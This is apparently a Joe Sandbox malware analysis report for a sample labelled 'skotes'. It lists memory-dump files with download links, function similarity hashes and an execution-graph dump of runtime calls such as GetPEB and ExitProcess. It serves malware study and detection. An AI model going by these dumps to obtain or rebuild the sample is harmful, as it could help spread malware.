                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                                                                                                                • Opcode ID: 48b3e7714bd372a9a58930d89a43260c0250f4430f44762c41142b4c22ea0cab
                                                                                                                                                                                                                                                                • Instruction ID: 2006138df6e24091bb2f55e6794a36c4ba104da9d5fedeff528f2c740bbb32e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48b3e7714bd372a9a58930d89a43260c0250f4430f44762c41142b4c22ea0cab
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1A1D171A012059FEF21DF64C945BAAB7F8FF16324F048269F815D7282EB35EA14CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                • Instruction ID: 59331a186c7f007e6ab3cfed68c9a5f719f4b1474f554e7d5868b872744e98c4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06B136729042869FDB15CF68C8817EEBBF5EF45360F54416BE956EB342DA348D01CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 531285432-0
                                                                                                                                                                                                                                                                • Opcode ID: 3f3d47d3bac42b97159e28fa9f29c0b8602effc7a29ef3e920122b8b31dbe983
                                                                                                                                                                                                                                                                • Instruction ID: 48cce6c6ab347477317b4117cc9718f8ae9b94498b94c64f3afb553221a74d19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f3d47d3bac42b97159e28fa9f29c0b8602effc7a29ef3e920122b8b31dbe983
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59210C71A00219AFDF00EFA4D995DFEBBB9EF09720F104069F501A7262DB609D019BA0

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                                Total number of Nodes:619
                                                                                                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                execution_graph 9666 ad6629 9669 ad64c7 9666->9669 9670 ad64d5 __cftof 9669->9670 9671 ad6520 9670->9671 9674 ad652b 9670->9674 9673 ad652a 9680 ada302 GetPEB 9674->9680 9676 ad6535 9677 ad653a GetPEB 9676->9677 9678 ad654a __cftof 9676->9678 9677->9678 9679 ad6562 ExitProcess 9678->9679 9681 ada31c __cftof 9680->9681 9681->9676 9687 aa5cad 9689 aa5caf shared_ptr __cftof 9687->9689 9688 aa5d17 shared_ptr std::future_error::future_error 9689->9688 9703 aa5c10 9689->9703 9691 aa66ac 9692 aa5c10 3 API calls 9691->9692 9693 aa66b1 9692->9693 9721 aa22c0 9693->9721 9695 aa66c9 shared_ptr 9696 aa5c10 3 API calls 9695->9696 9697 aa673d 9696->9697 9698 aa22c0 3 API calls 9697->9698 9700 aa6757 shared_ptr 9698->9700 9699 aa5c10 3 API calls 9699->9700 9700->9699 9701 aa22c0 3 API calls 9700->9701 9702 aa6852 shared_ptr std::future_error::future_error 9700->9702 9701->9700 9704 aa5c54 9703->9704 9724 aa4b30 9704->9724 9706 aa5c7b shared_ptr __cftof 9707 aa5d17 shared_ptr std::future_error::future_error 9706->9707 9708 aa5c10 3 API calls 9706->9708 9707->9691 9709 aa66ac 9708->9709 9710 aa5c10 3 API calls 9709->9710 9711 aa66b1 9710->9711 9712 aa22c0 3 API calls 9711->9712 9713 aa66c9 shared_ptr 9712->9713 9714 aa5c10 3 API calls 9713->9714 9715 aa673d 9714->9715 9716 aa22c0 3 API calls 9715->9716 9718 aa6757 shared_ptr 9716->9718 9717 aa5c10 3 API calls 9717->9718 9718->9717 9719 aa22c0 3 API calls 9718->9719 9720 aa6852 shared_ptr std::future_error::future_error 9718->9720 9719->9718 9720->9691 9845 aa2280 9721->9845 9726 aa4ce5 9724->9726 9727 aa4b92 9724->9727 9726->9706 9727->9726 9728 ad6da6 9727->9728 9729 ad6db4 9728->9729 9731 ad6dc2 9728->9731 9733 ad6d19 9729->9733 9731->9727 9738 ad690a 9733->9738 9737 ad6d3d 9737->9727 9739 ad692a 9738->9739 9745 ad6921 9738->9745 9739->9745 9752 ada671 9739->9752 9746 ad6d52 9745->9746 9747 ad6d8f 9746->9747 9748 ad6d5f 9746->9748 9837 adb67d 9747->9837 9749 ad6d6e 9748->9749 9832 adb6a1 9748->9832 9749->9737 9756 ada67b __dosmaperr __freea 9752->9756 9753 ad694a 9757 adb5fb 9753->9757 9756->9753 9765 ad8bec 9756->9765 9758 adb60e 9757->9758 9759 ad6960 9757->9759 9758->9759 9791 adf5ab 9758->9791 9761 adb628 9759->9761 9762 adb63b 9761->9762 9763 adb650 9761->9763 9762->9763 9798 ade6b1 9762->9798 9763->9745 9766 ad8bf1 __cftof 9765->9766 9770 ad8bfc ___std_exception_copy 9766->9770 9771 add634 9766->9771 9785 ad65ed 9770->9785 9773 add640 __cftof __dosmaperr 9771->9773 9772 add69c __dosmaperr ___std_exception_copy 9772->9770 9773->9772 9774 add81b __dosmaperr 9773->9774 9775 add726 9773->9775 9777 add751 __cftof 9773->9777 9776 ad65ed __cftof 3 API calls 9774->9776 9775->9777 9788 add62b 9775->9788 9779 add82e 9776->9779 9777->9772 9780 ada671 __cftof 3 API calls 9777->9780 9783 add7a5 9777->9783 9780->9783 9782 add62b __cftof 3 API calls 9782->9777 9783->9772 9784 ada671 __cftof 3 API calls 9783->9784 9784->9772 9786 ad64c7 __cftof 3 API calls 9785->9786 9787 ad65fe 9786->9787 9789 ada671 __cftof 3 API calls 9788->9789 9790 add630 9789->9790 9790->9782 9792 adf5b7 __cftof 9791->9792 9793 ada671 __cftof 3 API calls 9792->9793 9794 adf5c0 __cftof 9793->9794 9795 adf606 9794->9795 9796 ad8bec __cftof 3 API calls 9794->9796 9795->9759 9797 adf62b 9796->9797 9799 ada671 __cftof 3 API calls 9798->9799 9800 ade6bb 9799->9800 9803 ade5c9 9800->9803 9802 ade6c1 9802->9763 9807 ade5d5 __cftof __freea 9803->9807 9804 ade5f6 9804->9802 9805 ad8bec __cftof 3 API calls 9806 ade668 9805->9806 9808 ade6a4 9806->9808 9812 ada72e 9806->9812 9807->9804 9807->9805 9808->9802 9813 ada739 __dosmaperr __freea 9812->9813 9814 ad8bec __cftof 3 API calls 9813->9814 9816 ada7be 9813->9816 9815 ada7c7 9814->9815 9817 ade4b0 9816->9817 9818 ade5c9 __cftof 3 API calls 9817->9818 9819 ade4c3 9818->9819 9824 ade259 9819->9824 9821 ade4cb __cftof 9823 ade4dc __cftof __dosmaperr __freea 9821->9823 9827 ade6c4 9821->9827 9823->9808 9825 ad690a __cftof GetPEB ExitProcess GetPEB 9824->9825 9826 ade26b 9825->9826 9826->9821 9828 ade259 __cftof GetPEB ExitProcess GetPEB 9827->9828 9831 ade6e4 __cftof 9828->9831 9829 ade75a __cftof std::future_error::future_error 9829->9823 9830 ade32f __cftof GetPEB ExitProcess GetPEB 9830->9829 9831->9829 9831->9830 9833 ad690a __cftof 3 API calls 9832->9833 9834 adb6be 9833->9834 9836 adb6ce std::future_error::future_error 9834->9836 9842 adf1bf 9834->9842 9836->9749 9838 ada671 __cftof 3 API calls 9837->9838 9839 adb688 9838->9839 9840 adb5fb __cftof 3 API calls 9839->9840 9841 adb698 9840->9841 9841->9749 9843 ad690a __cftof 3 API calls 9842->9843 9844 adf1df __cftof __freea std::future_error::future_error 9843->9844 9844->9836 9846 aa2296 9845->9846 9849 ad87f8 9846->9849 9852 ad7609 9849->9852 9851 aa22a4 9851->9695 9853 ad7649 9852->9853 9856 ad7631 __dosmaperr ___std_exception_copy std::future_error::future_error 9852->9856 9854 ad690a __cftof 3 API calls 9853->9854 9853->9856 9855 ad7661 9854->9855 9858 ad7bc4 9855->9858 9856->9851 9860 ad7bd5 9858->9860 9859 ad7be4 __dosmaperr ___std_exception_copy 9859->9856 9860->9859 9865 ad8168 9860->9865 9870 ad7dc2 9860->9870 9875 ad7de8 9860->9875 9885 ad7f36 9860->9885 9866 ad8178 9865->9866 9867 ad8171 9865->9867 9866->9860 9894 ad7b50 9867->9894 9869 ad8177 9869->9860 9871 ad7dcb 9870->9871 9873 ad7dd2 9870->9873 9872 ad7b50 3 API calls 9871->9872 9874 ad7dd1 9872->9874 9873->9860 9874->9860 9876 ad7def 9875->9876 9877 ad7e09 __dosmaperr ___std_exception_copy 9875->9877 9876->9877 9878 ad7f69 9876->9878 9880 ad7fa2 9876->9880 9883 ad7f77 9876->9883 9877->9860 9878->9883 9884 ad7f8b 9878->9884 9912 ad8241 9878->9912 9880->9884 9908 ad8390 9880->9908 9883->9884 9916 ad86ea 9883->9916 9884->9860 9886 ad7f69 9885->9886 9887 ad7f4f 9885->9887 9888 ad8241 3 API calls 9886->9888 9892 ad7f77 9886->9892 9893 ad7f8b 9886->9893 9887->9886 9889 ad7fa2 9887->9889 9887->9892 9888->9892 9890 ad8390 3 API calls 9889->9890 9889->9893 9890->9892 9891 ad86ea 3 API calls 9891->9893 9892->9891 9892->9893 9893->9860 9895 ad7b62 __dosmaperr 9894->9895 9898 ad8ab6 9895->9898 9897 ad7b85 __dosmaperr 9897->9869 9899 ad8ad1 9898->9899 9902 ad8868 9899->9902 9901 ad8adb 9901->9897 9903 ad887a 9902->9903 9904 ad690a __cftof 3 API calls 9903->9904 9907 ad888f __dosmaperr ___std_exception_copy 9903->9907 9905 ad88bf 9904->9905 9906 ad6d52 3 API calls 9905->9906 9905->9907 9906->9905 9907->9901 9910 ad83ab 9908->9910 9909 ad83dd 9909->9883 9910->9909 9920 adc88e 9910->9920 9913 ad825a 9912->9913 9927 add3c8 9913->9927 9915 ad830d 9915->9883 9915->9915 9918 ad875d std::future_error::future_error 9916->9918 9919 ad8707 9916->9919 9917 adc88e __cftof 3 API calls 9917->9919 9918->9884 9919->9917 9919->9918 9923 adc733 9920->9923 9922 adc8a6 9922->9909 9924 adc743 9923->9924 9925 adc748 __cftof __dosmaperr ___std_exception_copy 9924->9925 9926 ad690a __cftof 3 API calls 9924->9926 9925->9922 9926->9925 9930 add3ee 9927->9930 9939 add3d8 __dosmaperr ___std_exception_copy 9927->9939 9928 add485 9931 add4ae 9928->9931 9932 add4e4 9928->9932 9929 add48a 9940 adcbdf 9929->9940 9930->9928 9930->9929 9930->9939 9934 add4cc 9931->9934 9935 add4b3 9931->9935 9957 adcef8 9932->9957 9953 add0e2 9934->9953 9946 add23e 9935->9946 9939->9915 9941 adcbf1 9940->9941 9942 ad690a __cftof 3 API calls 9941->9942 9943 adcc05 9942->9943 9944 adcef8 3 API calls 9943->9944 9945 adcc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 9943->9945 9944->9945 9945->9939 9949 add26c 9946->9949 9947 add2a5 9947->9939 9948 add2de 9964 adcf9a 9948->9964 9949->9947 9949->9948 9950 add2b7 9949->9950 9961 add16d 9950->9961 9954 add10f 9953->9954 9955 add14e 9954->9955 9956 add16d 3 API calls 9954->9956 9955->9939 9956->9955 9958 adcf10 9957->9958 9959 adcf75 9958->9959 9960 adcf9a 3 API calls 9958->9960 9959->9939 9960->9959 9962 ad690a __cftof GetPEB ExitProcess GetPEB 9961->9962 9963 add183 __cftof 9962->9963 9963->9947 9965 adcfab 9964->9965 9966 ad690a __cftof GetPEB ExitProcess GetPEB 9965->9966 9967 adcfb9 __dosmaperr ___std_exception_copy 9965->9967 9968 adcfda ___std_exception_copy 9966->9968 9967->9947 9969 aa20a0 9972 abc68b 9969->9972 9971 aa20ac 9975 abc3d5 9972->9975 9974 abc69b 9974->9971 9976 abc3eb 9975->9976 9977 abc3e1 9975->9977 9976->9974 9978 abc3be 9977->9978 9979 abc39e 9977->9979 9988 abcd0a 9978->9988 